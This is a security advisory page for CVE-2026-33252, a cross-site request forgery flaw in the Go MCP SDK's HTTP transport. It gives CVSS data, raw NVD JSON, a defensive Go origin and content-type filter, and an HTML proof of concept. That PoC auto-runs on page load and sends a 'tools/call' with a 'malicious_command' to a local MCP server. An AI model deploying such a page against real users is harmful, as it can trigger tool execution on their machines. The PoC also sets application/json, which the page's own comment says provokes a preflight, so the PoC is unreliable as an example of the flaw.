Security Vulnerability Report
CVE-2026-33252 CVSS 7.1 HIGH

Published: 2026-03-24 00:16:30
Last Modified: 2026-04-15 16:33:12

Description

The Go MCP SDK used Go's standard encoding/json. Prior to version 1.4.1, the Go SDK's Streamable HTTP transport accepted browser-generated cross-site `POST` requests without validating the `Origin` header and without requiring `Content-Type: application/json`. In deployments without Authorization, especially stateless or sessionless configurations, this allows an arbitrary website to send MCP requests to a local server and potentially trigger tool execution. Version 1.4.1 contains a patch for the issue.
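The two checks the description names, applied as a filter in front of the MCP handler, as an added Go example that is not the SDK's own patch; the listening address, the `/mcp` path and the origin allow-list are assumptions for the demonstration:

```go
package main

import (
	"fmt"
	"mime"
	"net/http"
	"net/http/httptest"
)

// guard is a hypothetical pre-dispatch filter (not the SDK's own fix) for a
// local MCP Streamable HTTP server: it reaches the real MCP handler only when
// the Origin and Content-Type checks pass. allowed is a constructed allow-list.
func guard(next http.Handler, allowed map[string]bool) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		// Browsers always attach Origin to cross-site requests and scripts cannot
		// forge it; no Origin at all is taken to mean a non-browser MCP client.
		if o := r.Header.Get("Origin"); o != "" && !allowed[o] {
			http.Error(w, "origin not allowed", http.StatusForbidden)
			return
		}
		// Requiring application/json makes a cross-site fetch() a non-"simple"
		// request: the browser sends a CORS preflight and withholds the POST
		// unless the server permits it (text/plain would skip the preflight).
		if r.Method == http.MethodPost {
			mt, _, err := mime.ParseMediaType(r.Header.Get("Content-Type"))
			if err != nil || mt != "application/json" {
				http.Error(w, "expected application/json", http.StatusUnsupportedMediaType)
				return
			}
		}
		next.ServeHTTP(w, r)
	})
}

// probe pushes one constructed request through guard and returns the status.
func probe(method, origin, contentType string) int {
	mcp := http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusOK) })
	req := httptest.NewRequest(method, "http://127.0.0.1:3000/mcp", nil)
	req.Header.Set("Origin", origin)
	req.Header.Set("Content-Type", contentType)
	rec := httptest.NewRecorder()
	guard(mcp, map[string]bool{"http://localhost:3000": true}).ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	fmt.Println(probe("POST", "http://other-site.example", "text/plain"))   // 403
	fmt.Println(probe("POST", "http://localhost:3000", "application/json")) // 200
}
```

Treating a missing Origin as a non-browser client is a policy choice made here; a deployment that only ever expects browser-based clients can reject that case as well.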

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L
Weakness: CWE-352

Note: the raw NVD record below also carries NVD's own primary assessment, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N with base score 6.5 (MEDIUM); the 7.1 above is the secondary-source score, which differs only in rating availability impact as Low rather than None.

Configurations (Affected Products)

cpe:2.3:a:lfprojects:mcp_go_sdk:*:*:*:*:*:*:*:* - VULNERABLE
Go MCP SDK < 1.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC for CVE-2026-33252: CSRF to trigger tool execution -->
<html>
<body>
<script>
function exploit() {
  const payload = JSON.stringify({
    jsonrpc: "2.0",
    method: "tools/call",
    params: { name: "example_tool", arguments: { "command": "malicious_command" } },
    id: 1
  });
  // Send request to local MCP server
  fetch('http://127.0.0.1:3000/mcp', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: payload
  }).then(response => console.log("Request sent"))
    .catch(error => console.error("Error", error));
}
// Auto-trigger on load
window.onload = exploit;
</script>
</body>
</html>

References

https://github.com/modelcontextprotocol/go-sdk/commit/a433a831d6e5d5ac3b9e625a8095aa8eaa040dfc (Patch)
https://github.com/modelcontextprotocol/go-sdk/security/advisories/GHSA-89xv-2j6f-qhc8 (Patch, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33252", "sourceIdentifier": "[email protected]", "published": "2026-03-24T00:16:30.017", "lastModified": "2026-04-15T16:33:12.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Go MCP SDK used Go's standard encoding/json. Prior to version 1.4.1, the Go SDK's Streamable HTTP transport accepted browser-generated cross-site `POST` requests without validating the `Origin` header and without requiring `Content-Type: application/json`. In deployments without Authorization, especially stateless or sessionless configurations, this allows an arbitrary website to send MCP requests to a local server and potentially trigger tool execution. Version 1.4.1 contains a patch for the issue."}, {"lang": "es", "value": "El SDK de Go MCP utilizaba el encoding/json estándar de Go. Antes de la versión 1.4.1, el transporte HTTP Streamable del SDK de Go aceptaba solicitudes 'POST' de sitio cruzado generadas por el navegador sin validar el encabezado 'Origin' y sin requerir 'Content-Type: application/json'. En implementaciones sin autorización, especialmente configuraciones sin estado o sin sesión, esto permite a un sitio web arbitrario enviar solicitudes MCP a un servidor local y potencialmente activar la ejecución de herramientas. La versión 1.4.1 contiene un parche para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lfprojects:mcp_go_sdk:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.1", "matchCriteriaId": "523AC61E-4F6E-4475-9CBE-F956F19ACA2A"}]}]}], "references": [{"url": "https://github.com/modelcontextprotocol/go-sdk/commit/a433a831d6e5d5ac3b9e625a8095aa8eaa040dfc", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/modelcontextprotocol/go-sdk/security/advisories/GHSA-89xv-2j6f-qhc8", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}